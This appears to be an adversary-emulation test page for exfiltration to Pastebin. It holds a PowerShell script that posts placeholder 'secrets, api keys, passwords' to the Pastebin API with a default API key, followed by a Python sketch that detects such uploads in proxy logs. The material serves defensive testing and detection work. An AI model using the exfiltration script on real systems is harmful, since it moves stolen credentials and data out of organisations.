Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as pastebin[.]com, are commonly used by developers to share code and other information.
Text storage sites are often used to host malicious code for C2 communication (e.g., [Stage Capabilities](https://attack.mitre.org/techniques/T1608)), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.(Citation: Pastebin EchoSec)
**Note:** This is distinct from [Exfiltration to Code Repository](https://attack.mitre.org/techniques/T1567/001), which highlights access to code repositories via APIs.
This test uses HTTP POST to exfiltrate data to a remote text storage site (Pastebin).
See https://web.archive.org/web/20201107203304/https://www.echosec.net/blog/what-is-pastebin-and-why-do-hackers-love-it
Supported Platforms: Windows
auto_generated_guid: c2e8ab6e-431e-460a-a2aa-3bc6a32022e3
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| api_key | Pastebin API key | string | 6nxrBm7UIJuaEuPOkH5Z8I7SvCLN3OP0 |
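```powershell
# Pastebin developer API key, supplied through the api_key input argument
$apiKey = "#{api_key}"
# Placeholder text standing in for the collected data
$content = "secrets, api keys, passwords..."
$url = "https://pastebin.com/api/api_post.php"
# Form fields sent in the POST body
$postData = @{
    api_dev_key    = $apiKey
    api_option     = "paste"
    api_paste_code = $content
}
# Submit the paste and print the response, which the script treats as the paste URL
$response = Invoke-RestMethod -Uri $url -Method Post -Body $postData
Write-Host "Your paste URL: $response"
```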
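A detection sketch for the traffic this test generates, added here as an example and not part of the original test: it flags POST requests to the Pastebin host in web proxy logs and raises severity for the API endpoint or a PowerShell user agent. The log line format, sample lines, host list and severity levels are constructed assumptions, and seeing the method and path of HTTPS requests assumes a TLS-inspecting proxy.

```python
import re
import shlex
from urllib.parse import urlsplit

# Hosts treated as text storage sites; extend for your environment (assumption).
PASTE_HOSTS = {"pastebin.com"}
# Matches the default user agents of Invoke-RestMethod / Invoke-WebRequest.
SCRIPTED_UA = re.compile(r"\b(?:Windows)?PowerShell/\d", re.IGNORECASE)

# Constructed sample lines: time src method url status bytes_out "user agent"
SAMPLE_LOG = '''\
2024-05-01T10:00:01Z 10.0.0.12 GET https://pastebin.com/raw/abcd1234 200 0 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/125.0"
2024-05-01T10:02:17Z 10.0.0.15 POST https://pastebin.com/api/api_post.php 200 112 "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.4291"
2024-05-01T10:03:40Z 10.0.0.15 POST https://example.org/api/upload 200 5000 "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.4291"
2024-05-01T10:04:11Z 10.0.0.31 POST https://pastebin.com/ 302 2048 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0"
2024-05-01T10:05:02Z 10.0.0.20 POST https://PASTEBIN.com/api/api_post.php 200 48213 "python-requests/2.31.0"
'''

def parse_line(line):
    """Split one proxy log line into a dict; return None if malformed."""
    try:
        ts, src, method, url, status, sent, ua = shlex.split(line)
        return {"ts": ts, "src": src, "method": method.upper(), "url": url,
                "status": int(status), "bytes_out": int(sent), "ua": ua}
    except ValueError:
        return None

def classify(event):
    """Return a severity for uploads to a text storage site, else None."""
    parts = urlsplit(event["url"])
    host = (parts.hostname or "").lower()
    on_paste_site = host in PASTE_HOSTS or any(host.endswith("." + h) for h in PASTE_HOSTS)
    if not on_paste_site or event["method"] != "POST":
        return None
    # The API endpoint used by the test, or a scripted client, raises severity.
    if parts.path == "/api/api_post.php" or SCRIPTED_UA.search(event["ua"]):
        return "high"
    return "medium"

def detect(log_text):
    """Return (severity, event) pairs for suspicious uploads in the log."""
    events = filter(None, map(parse_line, log_text.splitlines()))
    return [(sev, ev) for ev in events if (sev := classify(ev))]

if __name__ == "__main__":
    for severity, ev in detect(SAMPLE_LOG):
        print(severity, ev["ts"], ev["src"], ev["url"], ev["bytes_out"])
```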